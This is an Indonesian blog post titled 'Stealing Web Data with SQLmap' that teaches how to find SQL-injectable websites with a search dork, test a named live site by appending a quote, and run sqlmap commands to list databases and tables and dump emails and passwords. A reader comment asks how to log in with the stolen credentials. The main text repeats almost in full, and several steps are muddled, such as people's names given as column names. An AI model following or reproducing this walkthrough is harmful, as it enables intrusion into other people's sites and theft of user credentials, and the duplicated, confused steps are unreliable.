Mencuri Data WEB dengan SQLmap
Hello guys... balik lagi sama saya di blog tercinta ini... yg bakal memberi kalian referensi beserta tutorial berdasarkan pengalaman saya...
Kali ini saya akan memberikan tutorial " Mencuri Data Web Dengan SQLmap "
Kali ini agak repot sih guys, kita harus punya tool dan koneksi yg stabil
Toolsnya : SQLmap / Havij
: Web VULN
: Dork buat nyari website yg VULN
: Koneksi yg stabil
oke guys itu adalah peralatan yg kita butuhkan... seperti biasa saya akan memberi sedikit penjelasan...
" Koneksi... bicara tentang koneksi,Koneksi itu merupakan senjata utama para Hacker guys... jadi kalo perangkat anda kena serangan Hacker... maka Solusi utamanya putusin koneksi dulu... contohnya di Mode Pesawat... dan semoga Perangkat kita gak akan ada yg kena serangan Hacker ya guys.... "
Baca Juga : Cara Exploit Android Melalui Jaringan LAN
Gk usah banyak Cing And Cong ya guys... But...
Let's Do It !!!
*Langkah Pertama*
Cari web VULN dengan dork contoh " inurl://index.php?id= "
Cara menggunakan dork itu dengan mengetikkan dork di Search Engine
*Next Step*
Pilih salah satu web dan beri tanda petik di belakan url...
Contoh : www.karaoke.co.nz/items/index.php?id=37'
Nah... kalo hasilnya error:SQL syntax atau apalah itu..
tandanya bisa di eksekusi...
*Langkah Ketiga*
buka terminal terus ketik "sqlmap -u (web yg VULN) --dbs" perlu di-ingat
tanda petik yg diakhir URL dihilangkan...
Baca Juga : Cara Mudah Baca Kode Binary Atau Biner
*Langkah Selanjutnya*
Setelah di Enter maka tunggu beberapa menit dan akan muncul Database WEB tersebut, Semisal
- Account
- Administrator
*Langkah Berikutnya*
akses database Web tersebut dengan cara
" sqlmap -u (url WEB) -D Administrator --Table "
Maka akan muncul tabel Dari Database web tersebut, semisal
- Username
- Password
- Email
*Next Step*
Akses column web tersebut dengan cara
" sqlmap -u (url WEB) -D Administrator -T Email --column
maka akan muncul kolom dari tabel Database tersebut, semisal
- Riady
- Tejo
- Bakul
*Langkah Berikutnya*
Dump atau Clone Data dari kolom tersebut, Dengan Cara
"sqlmap -u (url WEB) -D Administrator -T Email -C Tejo --dump"
maka hasi yg diberikan yaitu, sebagai berikut :
Email = tejo121@gmail.com
Password = masganteng2232 (Bila Beruntung)
Kalau Mau Liat Video Tutor yg Lengkap bisa download lewat link dibawah
--->Tutorial Sqlmap Full Original<---
oke guys... sampe disini dulu aj perjumpaan kita tentang pembahasan SQLmap dan SQL injection yang saya berikan... Semoga bermanfaat bagi kita semua
Amiin...
NB : " bila terjadi sesuatu yg tidak berkenan, maka penulis blog tidak bertanggung jawab atas apa yg telah diperbuat "
Kali ini saya akan memberikan tutorial " Mencuri Data Web Dengan SQLmap "
Kali ini agak repot sih guys, kita harus punya tool dan koneksi yg stabil
Toolsnya : SQLmap / Havij
: Web VULN
: Dork buat nyari website yg VULN
: Koneksi yg stabil
oke guys itu adalah peralatan yg kita butuhkan... seperti biasa saya akan memberi sedikit penjelasan...
" Koneksi... bicara tentang koneksi,Koneksi itu merupakan senjata utama para Hacker guys... jadi kalo perangkat anda kena serangan Hacker... maka Solusi utamanya putusin koneksi dulu... contohnya di Mode Pesawat... dan semoga Perangkat kita gak akan ada yg kena serangan Hacker ya guys.... "
Baca Juga : Cara Exploit Android Melalui Jaringan LAN
Gk usah banyak Cing And Cong ya guys... But...
Let's Do It !!!
*Langkah Pertama*
Cari web VULN dengan dork contoh " inurl://index.php?id= "
Cara menggunakan dork itu dengan mengetikkan dork di Search Engine
*Next Step*
Pilih salah satu web dan beri tanda petik di belakan url...
Contoh : www.karaoke.co.nz/items/index.php?id=37'
Nah... kalo hasilnya error:SQL syntax atau apalah itu..
tandanya bisa di eksekusi...
*Langkah Ketiga*
buka terminal terus ketik "sqlmap -u (web yg VULN) --dbs" perlu di-ingat
tanda petik yg diakhir URL dihilangkan...
Baca Juga : Cara Mudah Baca Kode Binary Atau Biner
*Langkah Selanjutnya*
Setelah di Enter maka tunggu beberapa menit dan akan muncul Database WEB tersebut, Semisal
- Account
- Administrator
*Langkah Berikutnya*
akses database Web tersebut dengan cara
" sqlmap -u (url WEB) -D Administrator --Table "
Maka akan muncul tabel Dari Database web tersebut, semisal
- Username
- Password
*Next Step*
Akses column web tersebut dengan cara
" sqlmap -u (url WEB) -D Administrator -T Email --column
maka akan muncul kolom dari tabel Database tersebut, semisal
- Riady
- Tejo
- Bakul
*Langkah Berikutnya*
Dump atau Clone Data dari kolom tersebut, Dengan Cara
"sqlmap -u (url WEB) -D Administrator -T Email -C Tejo --dump"
maka hasi yg diberikan yaitu, sebagai berikut :
Email = tejo121@gmail.com
Password = masganteng2232 (Bila Beruntung)
Kalau Mau Liat Video Tutor yg Lengkap bisa download lewat link dibawah
--->Tutorial Sqlmap Full Original<---
oke guys... sampe disini dulu aj perjumpaan kita tentang pembahasan SQLmap dan SQL injection yang saya berikan... Semoga bermanfaat bagi kita semua
Amiin...
NB : " bila terjadi sesuatu yg tidak berkenan, maka penulis blog tidak bertanggung jawab atas apa yg telah diperbuat "
Trus kalo udah dapet email sama password-nya gimana cara logginya bossku???
ReplyDeleteTrikdomino88.blogspot.com